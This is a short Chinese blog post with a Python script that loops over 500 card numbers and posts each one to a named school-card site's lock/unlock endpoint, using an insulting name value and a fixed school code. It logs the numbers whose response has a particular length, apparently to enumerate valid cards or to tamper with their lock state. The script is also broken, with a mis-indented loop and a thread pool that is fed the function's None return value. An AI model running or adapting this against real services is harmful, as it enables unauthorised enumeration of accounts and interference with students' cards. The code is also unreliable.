Python一个爬虫

import requests

import re

import threading

 

from concurrent.futures import ThreadPoolExecutor

 

headers = {

    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.101 Safari/537.36'

}

 

 

def get_code():

      for i in range(300,800):

      url = f"https://xzf.yhkdz.cn/Home/LockUnlockCard?MobileNo=103{i}&cName=傻逼&SchoolCode=03141004&style=1"

      get = requests.post(url,headers=headers)

      length = len(get.text)

      if length == 70:

         code_1 = str(url).replace("&cName=傻逼&SchoolCode=03141004&style=1","")

         code_2 = code_1.replace("https://xzf.yhkdz.cn/Home/LockUnlockCard?MobileNo=","")

         code_ = code_2+'\n'

         #print(code_)

         with open("code_2.txt",'a',encoding="utf-8")as f:

            f.write(code_)

            print("over")

 

if __name__ == '__main__':

   g = get_code()

   with ThreadPoolExecutor(500) as t:

      t.submit(g)

你可能感兴趣的:(python,爬虫,开发语言)